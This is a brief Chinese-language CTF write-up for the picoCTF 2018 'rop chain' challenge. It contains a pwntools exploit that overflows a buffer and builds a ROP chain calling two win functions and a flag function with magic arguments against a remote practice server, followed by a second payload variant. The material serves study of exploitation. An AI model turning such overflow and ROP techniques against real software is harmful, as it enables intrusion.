picoctf_2018_rop chain(传参)

发表于 更新于 分类于

  1. 记录一个传参的pwn题

  2. 比较简单直接把exp,写详细点

    win_function2是win_function1的返回地址,p32(win_function2)有参数,flag + 0xBAAAAAAD分别是win_function2的返回地址和参数,0xBAAAAAAD +0xDEADBAAD分别是flag的返回地址和参数

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    from pwn import *
    from LibcSearcher import *
    #r = process('./PicoCTF_2018_rop_chain')
    r = remote("node5.buuoj.cn", 29125)
    offset = 0x18 + 0x04  
    win_function1 = 0x80485CB
    win_function2 = 0x80485D8
    flag = 0x804862B
    payload = offset * b'a' + p32(win_function1) + p32(win_function2) +  p32(flag) + p32(0xBAAAAAAD) +p32(0xDEADBAAD) 
    r.sendline(payload)
    r.interactive()

  3. 还有一种方式就是将返回地址设置为ebp

    1
    2
    #ebp=0x0804859b
    #payload=b'a'*(0x2c+4)+p32(0x8048586)+p32(0x804859D)+p32(ebp)+p32(0xACACACAC)+p32(0x8048606)+p32(ebp)+p32(0xBDBDBDBD)